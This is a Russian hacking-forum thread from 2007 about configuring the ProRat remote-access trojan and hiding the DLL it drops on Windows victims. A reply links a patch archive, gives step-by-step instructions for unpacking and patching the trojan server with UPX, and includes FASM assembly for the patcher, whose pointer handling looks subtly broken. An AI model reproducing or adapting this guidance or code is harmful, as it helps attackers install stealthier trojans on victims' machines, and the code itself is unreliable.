Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   ProRat нужна помощь (https://forum.antichat.xyz/showthread.php?t=45060)

Zedo83 23.07.2007 01:44
ProRat нужна помощь
 
имею ProRat 1.9SE
хочу нормально замутить CGI нотификацию

зарегился на фри хосте http://www.hostland.su/ который это поддерживает, закинул в папку cgi-bin выставил атрибуты для файлов как в справке написано захожу по ссылке http://www.mysite.xxx.ru/cgi-bin/prorat.cgi

и меня редиректит на другие сайты
че не таг ?


p.s. как спрятать dll прората которую он закидывает в винду

NetSter 03.08.2007 00:30
чем тебе пинч не катит?...

Zedo83 06.08.2007 00:31
если бы ты знал разницу между системами удаленного администрирования типа Бэкдор и троянами, ты бы не задавал таких глупых вопросов

Lamia 07.08.2007 13:15
ProRat прекрасно работает и без DLL.
Вот патч который не даёт дллкам выпорхнуть...

http://rapidshare.com/files/47467165/_.rar.html

Внутри архива сам патч,а так же упаковщик UPX и оболочька к нему!
Порядок действий:
1)Скачиваешь архив с патчем.
2)Настраеваешь ,делаешь сервер.
3)Открываешь файл upxshell--нажимаешь на декомпресию,и декомпресируешь сервер.
4)Затем берёшь файл @.exe и патчишь сервер про рата.
А это для желающих компилить самим.
; FASM
Код:
format PE GUI 4.0
entry start
include 'include\win32a.inc'

 files_h              dd ?
 maps_h              dd ?
 map_addr              dd ?
 ofn                      OPENFILENAME
 FilterString              db 'All Files',0,'*.*',0,0
 buffer              db  1024 dup(?)
 
start:


          mov            [ofn.lStructSize],sizeof.OPENFILENAME
          mov            [ofn.lpstrFilter],FilterString
          mov            [ofn.lpstrFile],buffer
          mov            [ofn.nMaxFile],1024
          mov            [ofn.Flags],OFN_FILEMUSTEXIST or OFN_PATHMUSTEXIST or OFN_LONGNAMES or OFN_EXPLORER or OFN_HIDEREADONLY
          invoke    GetOpenFileName,ofn
          cmp            eax,1
          jne            exit
          call            Create
      exit:
          invoke    ExitProcess,eax



Create:
          xor        esi,esi
          invoke CreateFile,buffer,GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,esi
          mov        [files_h],eax
          invoke  CreateFileMapping,eax,esi,PAGE_READWRITE,esi,esi,esi
          mov        [maps_h],eax
          invoke  MapViewOfFile,eax,FILE_MAP_WRITE,esi,esi,esi
          mov        [map_addr],eax
          mov ax,0c58ch
          mov cl,0c3h
          mov [eax],cl
          mov ax,0c784h
          mov [eax],cl
          invoke    UnmapViewOfFile,[map_addr]
          invoke    CloseHandle,[maps_h]
          invoke    CloseHandle,[files_h]
          mov eax,0
          ret




data import
                   
  library kernel32,'KERNEL32.DLL',\
          comdlg32,'COMDLG32.DLL',\
          shell32,'SHELL32.DLL'
                   
  include 'include\APIA\kernel32.inc'
  include 'include\APIA\comdlg32.inc'
  include 'include\APIA\shell32.inc'
                   
end data
Взято с http://damagelab.org....который увы уже не работает.


Время: 02:59